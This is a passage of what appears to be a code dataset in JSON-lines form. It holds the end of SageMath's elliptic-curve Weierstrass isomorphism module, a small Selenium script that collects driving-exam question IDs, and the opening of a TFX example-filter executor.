NOTE::\n\n In a list of automorphisms, there is no guarantee that the\n identity will be first!\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import baseWI\n sage: baseWI(1,2,3,4) == baseWI(1,2,3,4)\n True\n sage: baseWI(1,2,3,4) != baseWI(1,2,3,4)\n False\n sage: baseWI(1,2,3,4) < baseWI(1,2,3,5)\n True\n sage: baseWI(1,2,3,4) > baseWI(1,2,3,4)\n False\n\n It will never return equality if ``other`` is of another type::\n\n sage: baseWI() == 1\n False\n \"\"\"\n if not isinstance(other, baseWI):\n return (op == op_NE)\n return richcmp(self.tuple(), other.tuple(), op)\n\n def tuple(self):\n r\"\"\"\n Return the parameters `u,r,s,t` as a tuple.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: w = baseWI(2,3,4,5)\n sage: w.tuple()\n (2, 3, 4, 5)\n \"\"\"\n return (self.u, self.r, self.s, self.t)\n\n def __mul__(self, other):\n r\"\"\"\n Return the composition of this isomorphism and another.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: baseWI(1,2,3,4)*baseWI(5,6,7,8)\n (5, 56, 22, 858)\n sage: baseWI()*baseWI(1,2,3,4)*baseWI()\n (1, 2, 3, 4)\n \"\"\"\n u1, r1, s1, t1 = other.tuple()\n u2, r2, s2, t2 = self.tuple()\n return baseWI(u1 * u2,\n (u1**2) * r2 + r1,\n u1 * s2 + s1,\n (u1**3) * t2 + s1 * (u1**2) * r2 + t1)\n\n def __invert__(self):\n r\"\"\"\n Return the inverse of this isomorphism.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: w = baseWI(2,3,4,5)\n sage: ~w\n (1/2, -3/4, -2, 7/8)\n sage: w*~w\n (1, 0, 0, 0)\n sage: ~w*w\n (1, 0, 0, 0)\n sage: R. = QQ[]\n sage: w = baseWI(u,r,s,t)\n sage: ~w\n (1/u, (-r)/u^2, (-s)/u, (r*s - t)/u^3)\n sage: ~w*w\n (1, 0, 0, 0)\n \"\"\"\n u, r, s, t = self.tuple()\n return baseWI(1/u, -r/(u**2), -s/u, (r*s-t)/(u**3))\n\n def __repr__(self):\n r\"\"\"\n Return the string representation of this isomorphism.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: baseWI(2,3,4,5)\n (2, 3, 4, 5)\n \"\"\"\n return repr(self.tuple())\n\n def is_identity(self):\n r\"\"\"\n Return ``True`` if this is the identity isomorphism.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: w = baseWI(); w.is_identity()\n True\n sage: w = baseWI(2,3,4,5); w.is_identity()\n False\n \"\"\"\n return self.tuple() == (1, 0, 0, 0)\n\n def __call__(self, EorP):\n r\"\"\"\n Base application of isomorphisms to curves and points.\n\n A baseWI `w` may be applied to a list `[a1,a2,a3,a4,a6]`\n representing the `a`-invariants of an elliptic curve `E`,\n returning the `a`-invariants of `w(E)`; or to `P=[x,y]` or\n `P=[x,y,z]` representing a point in `\\mathbb{A}^2` or\n `\\mathbb{P}^2`, returning the transformed point.\n\n INPUT:\n\n - ``EorP`` -- either an elliptic curve, or a point on an elliptic curve.\n\n OUTPUT:\n\n The transformed curve or point.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: E = EllipticCurve([0,0,1,-7,6])\n sage: w = baseWI(2,3,4,5)\n sage: w(E.ainvs())\n [4, -7/4, 11/8, -3/2, -9/32]\n sage: P = E(-2,3)\n sage: w(P.xy())\n [-5/4, 9/4]\n sage: EllipticCurve(w(E.ainvs()))(w(P.xy()))\n (-5/4 : 9/4 : 1)\n \"\"\"\n u, r, s, t = self.tuple()\n if len(EorP) == 5:\n a1, a2, a3, a4, a6 = EorP\n a6 += r*(a4 + r*(a2 + r)) - t*(a3 + r*a1 + t)\n a4 += -s*a3 + 2*r*a2 - (t + r*s)*a1 + 3*r*r - 2*s*t\n a3 += r*a1 + t + t\n a2 += -s*a1 + 3*r - s*s\n a1 += 2*s\n 
return [a1/u, a2/u**2, a3/u**3, a4/u**4, a6/u**6]\n if len(EorP) == 2:\n x, y = EorP\n x -= r\n y -= (s*x+t)\n return [x/u**2, y/u**3]\n if len(EorP) == 3:\n x, y, z = EorP\n x -= r*z\n y -= (s*x+t*z)\n return [x/u**2, y/u**3, z]\n raise ValueError(\"baseWI(a) only for a=(x,y), (x:y:z) or (a1,a2,a3,a4,a6)\")\n\n\ndef isomorphisms(E, F, JustOne=False):\n r\"\"\"\n Return one or all isomorphisms between two elliptic curves.\n\n INPUT:\n\n - ``E``, ``F`` (EllipticCurve) -- Two elliptic curves.\n\n - ``JustOne`` (bool) If ``True``, returns one isomorphism, or ``None`` if\n the curves are not isomorphic. If ``False``, returns a (possibly\n empty) list of isomorphisms.\n\n OUTPUT:\n\n Either ``None``, or a 4-tuple `(u,r,s,t)` representing an isomorphism,\n or a list of these.\n\n .. note::\n\n This function is not intended for users, who should use the\n interface provided by ``ell_generic``.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: isomorphisms(EllipticCurve_from_j(0),EllipticCurve('27a3'))\n [(-1, 0, 0, -1), (1, 0, 0, 0)]\n sage: isomorphisms(EllipticCurve_from_j(0),EllipticCurve('27a3'),JustOne=True)\n (1, 0, 0, 0)\n sage: isomorphisms(EllipticCurve_from_j(0),EllipticCurve('27a1'))\n []\n sage: isomorphisms(EllipticCurve_from_j(0),EllipticCurve('27a1'),JustOne=True)\n\n TESTS:\n\n Check that :trac:`32632` is fixed::\n\n sage: z8 = GF(2^8).gen()\n sage: E1 = EllipticCurve([z8, z8, z8, z8, z8])\n sage: isomorphisms(E1, E1)\n [(1, 0, 0, 0), (1, 0, z8, z8)]\n sage: E2 = EllipticCurve([z8^2, 0, 0, 0, z8^7 + z8^4])\n sage: isomorphisms(E1, E2)\n [(z8^7 + z8^3 + z8^2 + z8, 1, 1, z8^7 + z8^3 + z8^2 + z8 + 1),\n (z8^7 + z8^3 + z8^2 + z8, 1, z8 + 1, z8^7 + z8^3 + z8^2 + z8 + 1)]\n \"\"\"\n from .ell_generic import is_EllipticCurve\n if not is_EllipticCurve(E) or not is_EllipticCurve(F):\n raise ValueError(\"arguments are not elliptic curves\")\n K = E.base_ring()\n\n j = E.j_invariant()\n if j != F.j_invariant():\n if JustOne:\n return None\n return []\n\n from sage.rings.polynomial.polynomial_ring import polygen\n x = polygen(K, 'x')\n\n a1E, a2E, a3E, a4E, a6E = E.ainvs()\n a1F, a2F, a3F, a4F, a6F = F.ainvs()\n\n char = K.characteristic()\n\n if char == 2:\n if j == 0:\n ulist = (x**3-(a3E/a3F)).roots(multiplicities=False)\n ans = []\n for u in ulist:\n slist = (x**4+a3E*x+(a2F**2+a4F)*u**4+a2E**2+a4E).roots(multiplicities=False)\n for s in slist:\n r = s**2+a2E+a2F*u**2\n tlist = (x**2 + a3E*x + r**3 + a2E*r**2 + a4E*r + a6E + a6F*u**6).roots(multiplicities=False)\n for t in tlist:\n if JustOne:\n return (u, r, s, t)\n ans.append((u, r, s, t))\n if JustOne:\n return None\n ans.sort()\n return ans\n else:\n ans = []\n u = a1E/a1F\n r = (a3E+a3F*u**3)/a1E\n slist = [s[0] for s in (x**2+a1E*x+(r+a2E+a2F*u**2)).roots()]\n for s in slist:\n t = (a4E+a4F*u**4 + s*a3E + r*s*a1E + r**2) / a1E\n if JustOne:\n return (u, r, s, t)\n ans.append((u, r, s, t))\n if JustOne:\n return None\n ans.sort()\n return ans\n\n b2E, b4E, b6E, b8E = E.b_invariants()\n b2F, b4F, b6F, b8F = F.b_invariants()\n\n if char == 3:\n if j == 0:\n ulist = (x**4-(b4E/b4F)).roots(multiplicities=False)\n ans = []\n for u in ulist:\n s = a1E-a1F*u\n t = a3E-a3F*u**3\n rlist = (x**3-b4E*x+(b6E-b6F*u**6)).roots(multiplicities=False)\n for r in rlist:\n if JustOne:\n return (u, r, s, t+r*a1E)\n ans.append((u, r, s, t+r*a1E))\n if JustOne:\n return None\n ans.sort()\n return ans\n else:\n ulist = (x**2 - b2E / b2F).roots(multiplicities=False)\n ans = []\n for u in ulist:\n r = (b4F * 
u**4 - b4E) / b2E\n                s = (a1E - a1F * u)\n                t = (a3E - a3F * u**3 + a1E * r)\n                if JustOne:\n                    return (u, r, s, t)\n                ans.append((u, r, s, t))\n            if JustOne:\n                return None\n            ans.sort()\n            return ans\n\n# now char!=2,3:\n    c4E, c6E = E.c_invariants()\n    c4F, c6F = F.c_invariants()\n\n    if j == 0:\n        m, um = 6, c6E/c6F\n    elif j == 1728:\n        m, um = 4, c4E/c4F\n    else:\n        m, um = 2, (c6E*c4F)/(c6F*c4E)\n    ulist = (x**m-um).roots(multiplicities=False)\n    ans = []\n    for u in ulist:\n        s = (a1F*u - a1E)/2\n        r = (a2F*u**2 + a1E*s + s**2 - a2E)/3\n        t = (a3F*u**3 - a1E*r - a3E)/2\n        if JustOne:\n            return (u, r, s, t)\n        ans.append((u, r, s, t))\n    if JustOne:\n        return None\n    ans.sort()\n    return ans\n\n\nclass WeierstrassIsomorphism(EllipticCurveHom, baseWI):\n    r\"\"\"\n    Class representing a Weierstrass isomorphism between two elliptic curves.\n    \"\"\"\n    def __init__(self, E=None, urst=None, F=None):\n        r\"\"\"\n        Constructor for the WeierstrassIsomorphism class.\n\n        INPUT:\n\n        - ``E`` -- an EllipticCurve, or None (see below).\n\n        - ``urst`` -- a 4-tuple `(u,r,s,t)`, or None (see below).\n\n        - ``F`` -- an EllipticCurve, or None (see below).\n\n        Given two elliptic curves ``E`` and ``F`` (represented by\n        Weierstrass models as usual), and a transformation ``urst``\n        from ``E`` to ``F``, construct an isomorphism from ``E`` to\n        ``F``.  An exception is raised if ``urst(E)!=F``.  At most one\n        of ``E``, ``F``, ``urst`` can be None.  If ``F==None`` then\n        ``F`` is constructed as ``urst(E)``.  If ``E==None`` then\n        ``E`` is constructed as ``urst^-1(F)``.  If ``urst==None``\n        then an isomorphism from ``E`` to ``F`` is constructed if\n        possible, and an exception is raised if they are not\n        isomorphic.  Otherwise ``urst`` can be a tuple of length 4 or\n        an object of type ``baseWI``.\n\n        Users will not usually need to use this class directly, but instead use\n        methods such as ``isomorphism`` of elliptic curves.\n\n        EXAMPLES::\n\n            sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n            sage: WeierstrassIsomorphism(EllipticCurve([0,1,2,3,4]),(-1,2,3,4))\n            Elliptic-curve morphism:\n            From: Elliptic Curve defined by y^2 + 2*y = x^3 + x^2 + 3*x + 4 over Rational Field\n            To:   Elliptic Curve defined by y^2 - 6*x*y - 10*y = x^3 - 2*x^2 - 11*x - 2 over Rational Field\n            Via:  (u,r,s,t) = (-1, 2, 3, 4)\n            sage: E = EllipticCurve([0,1,2,3,4])\n            sage: F = EllipticCurve(E.cremona_label())\n            sage: WeierstrassIsomorphism(E,None,F)\n            Elliptic-curve morphism:\n            From: Elliptic Curve defined by y^2 + 2*y = x^3 + x^2 + 3*x + 4 over Rational Field\n            To:   Elliptic Curve defined by y^2 = x^3 + x^2 + 3*x + 5 over Rational Field\n            Via:  (u,r,s,t) = (1, 0, 0, -1)\n            sage: w = WeierstrassIsomorphism(None,(1,0,0,-1),F)\n            sage: w._domain==E\n            True\n\n        TESTS:\n\n        Check for :trac:`33215`::\n\n            sage: E = EllipticCurve(GF(71^2),[5,5])\n            sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism\n            sage: iso = WeierstrassIsomorphism(E, (1,2,3,4))\n            sage: ~iso  # indirect doctest\n            Elliptic-curve morphism:\n            From: Elliptic Curve defined by y^2 + 6*x*y + 8*y = x^3 + 68*x^2 + 64*x + 7 over Finite Field in z2 of size 71^2\n            To:   Elliptic Curve defined by y^2 = x^3 + 5*x + 5 over Finite Field in z2 of size 71^2\n            Via:  (u,r,s,t) = (1, 69, 68, 2)\n        \"\"\"\n        from .ell_generic import is_EllipticCurve\n\n        if E is not None:\n            if not is_EllipticCurve(E):\n                raise ValueError(\"first argument must be an elliptic curve or None\")\n        if F is not None:\n            if not is_EllipticCurve(F):\n                raise ValueError(\"third argument must be an elliptic curve or None\")\n        if 
urst is not None:\n            if len(urst) != 4:\n                raise ValueError(\"second argument must be [u,r,s,t] or None\")\n        if len([par for par in [E, urst, F] if par is not None]) < 2:\n            raise ValueError(\"at most 1 argument can be None\")\n\n        inps = []\n        if E is not None:\n            inps.append(E.base_ring())\n        if F is not None:\n            inps.append(F.base_ring())\n        if urst is not None:\n            inps += list(urst)\n        base_ring = get_coercion_model().common_parent(*inps)\n\n        if urst is not None:\n            urst = Sequence(urst, base_ring)\n\n        if F is None:  # easy case\n            baseWI.__init__(self, *urst)\n            F = EllipticCurve(baseWI.__call__(self, list(E.a_invariants())))\n\n        elif E is None:  # easy case in reverse\n            baseWI.__init__(self, *urst)\n            inv_urst = baseWI.__invert__(self)\n            E = EllipticCurve(baseWI.__call__(inv_urst, list(F.a_invariants())))\n\n        elif urst is None:  # try to construct the morphism\n            urst = isomorphisms(E, F, True)\n            if urst is None:\n                raise ValueError(\"elliptic curves not isomorphic\")\n            baseWI.__init__(self, *urst)\n\n        else:  # none of the parameters is None:\n            baseWI.__init__(self, *urst)\n            if F != EllipticCurve(baseWI.__call__(self, list(E.a_invariants()))):\n                raise ValueError(\"second argument is not an isomorphism from first argument to third argument\")\n\n        self._mpoly_ring = PolynomialRing(base_ring, ['x','y'])\n        self._poly_ring = PolynomialRing(base_ring, ['x'])\n\n        self._domain = E\n        self._codomain = F\n        EllipticCurveHom.__init__(self, self._domain, self._codomain)\n\n    def _richcmp_(self, other, op):\n        r\"\"\"\n        Standard comparison function for the WeierstrassIsomorphism class.\n\n        EXAMPLES::\n\n            sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n            sage: E = EllipticCurve('389a1')\n            sage: F = E.change_weierstrass_model(1,2,3,4)\n            sage: w1 = E.isomorphism_to(F)\n            sage: w1 == w1\n            True\n            sage: w2 = F.automorphisms()[0] *w1\n            sage: w1 == w2\n            False\n\n            sage: E = EllipticCurve_from_j(GF(7)(0))\n            sage: F = E.change_weierstrass_model(2,3,4,5)\n            sage: a = E.isomorphisms(F)\n            sage: b = [w*a[0] for w in F.automorphisms()]\n            sage: b.sort()\n            sage: a == b\n            True\n            sage: c = [a[0]*w for w in E.automorphisms()]\n            sage: c.sort()\n            sage: a == c\n            True\n        \"\"\"\n        if isinstance(other, WeierstrassIsomorphism):\n            lx = self._domain\n            rx = other._domain\n            if lx != rx:\n                return richcmp_not_equal(lx, rx, op)\n\n            lx = self._codomain\n            rx = other._codomain\n            if lx != rx:\n                return richcmp_not_equal(lx, rx, op)\n\n            return baseWI.__richcmp__(self, other, op)\n\n        return EllipticCurveHom._richcmp_(self, other, op)\n\n    def _eval(self, P):\n        r\"\"\"\n        Less strict evaluation method for internal use.\n\n        In particular, this can be used to evaluate ``self`` at a\n        point defined over an extension field.\n\n        INPUT: a sequence of 3 coordinates defining a point on ``self``\n\n        OUTPUT: the result of evaluating ``self`` at the given point\n\n        EXAMPLES::\n\n            sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism\n            sage: E = EllipticCurve([i,0]); E\n            Elliptic Curve defined by y^2 = x^3 + I*x over Number Field in I with defining polynomial x^2 + 1 with I = 1*I\n            sage: iso = WeierstrassIsomorphism(E, (i,1,2,3))\n            sage: P = E.change_ring(QQbar).lift_x(QQbar.random_element())\n            sage: Q = iso._eval(P)\n            sage: Q.curve()\n            Elliptic Curve defined by y^2 + (-4*I)*x*y + 6*I*y = x^3 + x^2 + (I-9)*x + (-I+8) over Algebraic Field\n            sage: y = next(filter(bool, iter(QQbar.random_element, None)))  # sample until nonzero\n            sage: iso._eval((0, y, 0)) == 0\n            True\n        \"\"\"\n        if self._domain.defining_polynomial()(*P):\n            
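# added note: a nonzero value of the defining polynomial means P does not lie on the domain curve\n            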
raise ValueError(f'{P} not on {self._domain}')\n\n Q = baseWI.__call__(self, P)\n k = Sequence(tuple(P) + tuple(Q)).universe()\n return self._codomain.base_extend(k).point(Q)\n\n def __call__(self, P):\n r\"\"\"\n Call function for WeierstrassIsomorphism class.\n\n INPUT:\n\n - ``P`` (Point) -- a point on the domain curve.\n\n OUTPUT:\n\n (Point) the transformed point on the codomain curve.\n\n EXAMPLES::\n\n sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *\n sage: E = EllipticCurve('37a1')\n sage: w = WeierstrassIsomorphism(E,(2,3,4,5))\n sage: P = E(0,-1)\n sage: w(P)\n (-3/4 : 3/4 : 1)\n sage: w(P).curve() == E.change_weierstrass_model((2,3,4,5))\n True\n \"\"\"\n if P[2] == 0:\n return self._codomain(0)\n return self._codomain.point(baseWI.__call__(self,\n tuple(P._coords)),\n check=False)\n\n def __invert__(self):\n r\"\"\"\n Return the inverse of this WeierstrassIsomorphism.\n\n EXAMPLES::\n\n sage: E = EllipticCurve('5077')\n sage: F = E.change_weierstrass_model([2,3,4,5]); F\n Elliptic Curve defined by y^2 + 4*x*y + 11/8*y = x^3 - 7/4*x^2 - 3/2*x - 9/32 over Rational Field\n sage: w = E.isomorphism_to(F)\n sage: P = E(-2,3,1)\n sage: w(P)\n (-5/4 : 9/4 : 1)\n sage: ~w\n Elliptic-curve morphism:\n From: Elliptic Curve defined by y^2 + 4*x*y + 11/8*y = x^3 - 7/4*x^2 - 3/2*x - 9/32 over Rational Field\n To: Elliptic Curve defined by y^2 + y = x^3 - 7*x + 6 over Rational Field\n Via: (u,r,s,t) = (1/2, -3/4, -2, 7/8)\n sage: Q = w(P); Q\n (-5/4 : 9/4 : 1)\n sage: (~w)(Q)\n (-2 : 3 : 1)\n \"\"\"\n winv = baseWI.__invert__(self).tuple()\n return WeierstrassIsomorphism(self._codomain, winv, self._domain)\n\n @staticmethod\n def _composition_impl(left, right):\n r\"\"\"\n Return the composition of a ``WeierstrassIsomorphism``\n with another elliptic-curve morphism.\n\n Called by :meth:`EllipticCurveHom._composition_`.\n\n EXAMPLES::\n\n sage: E1 = EllipticCurve('5077')\n sage: E2 = E1.change_weierstrass_model([2,3,4,5])\n sage: w1 = E1.isomorphism_to(E2)\n sage: E3 = E2.change_weierstrass_model([6,7,8,9])\n sage: w2 = E2.isomorphism_to(E3)\n sage: P = E1(-2,3,1)\n sage: (w2*w1)(P) == w2(w1(P))\n True\n\n TESTS:\n\n We should return ``NotImplemented`` when passed a combination of\n elliptic-curve morphism types that we don't handle here::\n\n sage: E = EllipticCurve([1,0])\n sage: phi = E.isogeny(E(0,0))\n sage: w1._composition_impl(phi.dual(), phi)\n NotImplemented\n \"\"\"\n if isinstance(left, WeierstrassIsomorphism) and isinstance(right, WeierstrassIsomorphism):\n if left._domain != right._codomain:\n raise ValueError(\"Domain of first argument must equal codomain of second\")\n w = baseWI.__mul__(left, right)\n return WeierstrassIsomorphism(right._domain, w.tuple(), left._codomain)\n\n return NotImplemented\n\n def __repr__(self):\n r\"\"\"\n Return the string representation of this WeierstrassIsomorphism.\n\n OUTPUT:\n\n (string) The underlying morphism, together with an extra line\n showing the `(u,r,s,t)` parameters.\n\n EXAMPLES::\n\n sage: E1 = EllipticCurve('5077')\n sage: E2 = E1.change_weierstrass_model([2,3,4,5])\n sage: E1.isomorphism_to(E2)\n Elliptic-curve morphism:\n From: Elliptic Curve defined by y^2 + y = x^3 - 7*x + 6 over Rational Field\n To: Elliptic Curve defined by y^2 + 4*x*y + 11/8*y = x^3 - 7/4*x^2 - 3/2*x - 9/32 over Rational Field\n Via: (u,r,s,t) = (2, 3, 4, 5)\n \"\"\"\n return EllipticCurveHom.__repr__(self) + \"\\n Via: (u,r,s,t) = \" + baseWI.__repr__(self)\n\n # EllipticCurveHom methods\n\n def degree(self):\n \"\"\"\n Return the 
degree as a rational map of this isomorphism.\n\n        Isomorphisms always have degree `1` by definition.\n\n        EXAMPLES::\n\n            sage: E1 = EllipticCurve([1,2,3,4,5])\n            sage: E2 = EllipticCurve_from_j(E1.j_invariant())\n            sage: E1.isomorphism_to(E2).degree()\n            1\n\n        TESTS:\n\n        Test for :trac:`33312`::\n\n            sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism\n            sage: type(WeierstrassIsomorphism.degree(None))\n            <class 'sage.rings.integer.Integer'>\n        \"\"\"\n        return Integer(1)\n\n    def rational_maps(self):\n        \"\"\"\n        Return the pair of rational maps defining this isomorphism.\n\n        EXAMPLES::\n\n            sage: E1 = EllipticCurve([11,22,33,44,55])\n            sage: E2 = EllipticCurve_from_j(E1.j_invariant())\n            sage: iso = E1.isomorphism_to(E2); iso\n            Elliptic-curve morphism:\n            From: Elliptic Curve defined by y^2 + 11*x*y + 33*y = x^3 + 22*x^2 + 44*x + 55 over Rational Field\n            To:   Elliptic Curve defined by y^2 + x*y = x^3 + x^2 - 684*x + 6681 over Rational Field\n            Via:  (u,r,s,t) = (1, -17, -5, 77)\n            sage: iso.rational_maps()\n            (x + 17, 5*x + y + 8)\n            sage: f = E2.defining_polynomial()(*iso.rational_maps(), 1)\n            sage: I = E1.defining_ideal()\n            sage: x,y,z = I.ring().gens()\n            sage: f in I + Ideal(z-1)\n            True\n\n        ::\n\n            sage: E = EllipticCurve(GF(65537), [1,1,1,1,1])\n            sage: w = E.isomorphism_to(E.short_weierstrass_model())\n            sage: f,g = w.rational_maps()\n            sage: P = E.random_point()\n            sage: w(P).xy() == (f(P.xy()), g(P.xy()))\n            True\n\n        TESTS::\n\n            sage: iso.rational_maps()[0].parent()\n            Multivariate Polynomial Ring in x, y over Rational Field\n            sage: iso.rational_maps()[1].parent()\n            Multivariate Polynomial Ring in x, y over Rational Field\n        \"\"\"\n        return tuple(baseWI.__call__(self, self._mpoly_ring.gens()))\n\n    def x_rational_map(self):\n        \"\"\"\n        Return the `x`-coordinate rational map of this isomorphism.\n\n        EXAMPLES::\n\n            sage: E1 = EllipticCurve([11,22,33,44,55])\n            sage: E2 = EllipticCurve_from_j(E1.j_invariant())\n            sage: iso = E1.isomorphism_to(E2); iso\n            Elliptic-curve morphism:\n            From: Elliptic Curve defined by y^2 + 11*x*y + 33*y = x^3 + 22*x^2 + 44*x + 55 over Rational Field\n            To:   Elliptic Curve defined by y^2 + x*y = x^3 + x^2 - 684*x + 6681 over Rational Field\n            Via:  (u,r,s,t) = (1, -17, -5, 77)\n            sage: iso.x_rational_map()\n            x + 17\n            sage: iso.x_rational_map() == iso.rational_maps()[0]\n            True\n\n        TESTS::\n\n            sage: iso.x_rational_map().parent()\n            Univariate Polynomial Ring in x over Rational Field\n        \"\"\"\n        x, = self._poly_ring.gens()\n        return (x - self.r) / self.u**2\n\n    def kernel_polynomial(self):\n        \"\"\"\n        Return the kernel polynomial of this isomorphism.\n\n        Isomorphisms have trivial kernel by definition, hence this\n        method always returns `1`.\n\n        EXAMPLES::\n\n            sage: E1 = EllipticCurve([11,22,33,44,55])\n            sage: E2 = EllipticCurve_from_j(E1.j_invariant())\n            sage: iso = E1.isomorphism_to(E2)\n            sage: iso.kernel_polynomial()\n            1\n            sage: psi = E1.isogeny(iso.kernel_polynomial(), codomain=E2); psi\n            Isogeny of degree 1 from Elliptic Curve defined by y^2 + 11*x*y + 33*y = x^3 + 22*x^2 + 44*x + 55 over Rational Field to Elliptic Curve defined by y^2 + x*y = x^3 + x^2 - 684*x + 6681 over Rational Field\n            sage: psi in {iso, -iso}\n            True\n\n        TESTS::\n\n            sage: iso.kernel_polynomial().parent()\n            Univariate Polynomial Ring in x over Rational Field\n        \"\"\"\n        return self._poly_ring(1)\n\n    def dual(self):\n        \"\"\"\n        Return the dual isogeny of this isomorphism.\n\n        For isomorphisms, the dual is just the inverse.\n\n        EXAMPLES::\n\n            sage: from sage.schemes.elliptic_curves.weierstrass_morphism import 
WeierstrassIsomorphism\n            sage: E = EllipticCurve(QuadraticField(-3), [0,1])\n            sage: w = WeierstrassIsomorphism(E, (CyclotomicField(3).gen(),0,0,0))\n            sage: (w.dual() * w).rational_maps()\n            (x, y)\n\n        ::\n\n            sage: E1 = EllipticCurve([11,22,33,44,55])\n            sage: E2 = E1.short_weierstrass_model()\n            sage: iso = E1.isomorphism_to(E2)\n            sage: iso.dual() == ~iso\n            True\n        \"\"\"\n        return ~self\n\n    def __neg__(self):\n        \"\"\"\n        Return the negative of this isomorphism, i.e., its composition\n        with the negation map `[-1]`.\n\n        EXAMPLES::\n\n            sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism\n            sage: E = EllipticCurve([11,22,33,44,55])\n            sage: w = WeierstrassIsomorphism(E, (66,77,88,99))\n            sage: -w\n            Elliptic-curve morphism:\n            From: Elliptic Curve defined by y^2 + 11*x*y + 33*y = x^3 + 22*x^2 + 44*x + 55 over Rational Field\n            To:   Elliptic Curve defined by y^2 + 17/6*x*y + 49/13068*y = x^3 - 769/396*x^2 - 3397/862488*x + 44863/7513995456 over Rational Field\n            Via:  (u,r,s,t) = (-66, 77, -99, -979)\n            sage: -(-w) == w\n            True\n\n        ::\n\n            sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism\n            sage: K.<a> = QuadraticField(-3)\n            sage: E = EllipticCurve(K, [0,1])\n            sage: w = WeierstrassIsomorphism(E, (CyclotomicField(3).gen(),0,0,0))\n            sage: w.tuple()\n            (1/2*a - 1/2, 0, 0, 0)\n            sage: (-w).tuple()\n            (-1/2*a + 1/2, 0, 0, 0)\n            sage: (-w)^3 == -(w^3)\n            True\n\n        ::\n\n            sage: from sage.schemes.elliptic_curves.weierstrass_morphism import WeierstrassIsomorphism\n            sage: E = EllipticCurve(QuadraticField(-1), [1,0])\n            sage: t = WeierstrassIsomorphism(E, (i,0,0,0))\n            sage: -t^2 == WeierstrassIsomorphism(E, (1,0,0,0))\n            True\n        \"\"\"\n        a1,_,a3,_,_ = self._domain.a_invariants()\n        w = baseWI(-1, 0, -a1, -a3)\n        urst = baseWI.__mul__(self, w).tuple()\n        return WeierstrassIsomorphism(self._domain, urst, self._codomain)\n\n","repo_name":"mkoeppe/sage-archive-2023-02-06","sub_path":"src/sage/schemes/elliptic_curves/weierstrass_morphism.py","file_name":"weierstrass_morphism.py","file_ext":"py","file_size_in_byte":31373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"29779379891","text":"import selenium.webdriver\r\nfrom bs4 import BeautifulSoup\r\nimport json\r\n\r\nif __name__ == '__main__':\r\n    dict_question = {}\r\n    url = \"https://www.jiakaobaodian.com/mnks/exercise/0-car-kemu1-beijing.html?id=800500\"\r\n    google = selenium.webdriver.Chrome(r'D:\软件\google\ChromeCore\chromedriver.exe')\r\n    google.get(url)\r\n    html = google.page_source\r\n    google.quit()\r\n    # print(html)\r\n    soup = BeautifulSoup(html, \"html.parser\")\r\n    ul = soup.find('ul', class_=\"list-w clearfix hide\")\r\n    li_all = ul.find_all(\"li\")\r\n    '''\r\n    After the database is updated, just add the corresponding number of newly added questions here-----------------------------------------------**************************************\r\n    '''\r\n    li_all = li_all[0:2204]\r\n    for li in li_all:\r\n        i = li.find('a')\r\n        dict_question[f'{i.get(\"data-id\")}'] = f\"{eval(i.get('data-index')) + 1}\"\r\n    dict_json = json.dumps(dict_question, sort_keys=False, indent=4, separators=(',', ':'))\r\n    with open(\"./question.json\",'w') as f:\r\n        f.write(dict_json)\r\n","repo_name":"tangsangsimida/python_sipider_-","sub_path":"1_2000+的题目对应的编号写入字典.py","file_name":"1_2000+的题目对应的编号写入字典.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"27485606133","text":"from __future__ import absolute_import\nfrom __future__ import 
division\nfrom __future__ import print_function\n\nimport json\nimport os\nfrom typing import Any, Dict, Mapping, List, Text\n\nimport apache_beam as beam\nimport tensorflow as tf\nfrom absl import logging\nfrom tfx import types\nfrom tfx.dsl.components.base import base_beam_executor\nfrom tfx.types import artifact_utils, Artifact\nfrom tfx.utils import io_utils, json_utils\n\nfrom tfx_x.components import utils\n\nFILTERED_EXAMPLES_KEY = 'filtered_examples'\nEXAMPLES_KEY = 'examples'\nPREDICATE_FN_KEY = 'predicate_fn'\nSPLITS_TO_COPY_KEY = 'splits_to_copy'\nSPLITS_TO_TRANSFORM_KEY = 'splits_to_transform'\nPIPELINE_CONFIGURATION_KEY = 'pipeline_configuration'\nPREDICATE_FN_KEY_KEY = 'predicate_fn_key'\n\n_FILTERED_EXAMPLES_FILE_PREFIX = 'filtered_examples'\n_FILTERED_EXAMPLES_DIR_NAME = 'filtered_examples'\n\n\nclass Executor(base_beam_executor.BaseBeamExecutor):\n  \"\"\"TFX example filter executor.\"\"\"\n\n  def Do(self, input_dict: Dict[Text, List[types.Artifact]],\n         output_dict: Dict[Text, List[types.Artifact]],\n         exec_properties: Dict[Text, Any]) -> None:\n    \"\"\"Runs predicate-based filtering on the given input examples.\n    Args:\n      input_dict: Input dict from input key to a list of Artifacts.\n        - examples: the input examples.\n        - pipeline_configuration: optional PipelineConfiguration artifact.\n      output_dict: Output dict from output key to a list of Artifacts.\n        - filtered_examples: the filtered examples.\n      exec_properties: A dict of execution properties.\n        - splits_to_transform: list of splits to transform.\n        - splits_to_copy: list of splits to copy as is.\n        - predicate_fn: the function that decides whether a sample is kept - must define 'predicate: Example -> bool'\n        - predicate_fn_key: alternate name for the key containing the def of `predicate()`\n    Returns:\n      None\n    \"\"\"\n    self._log_startup(input_dict, output_dict, 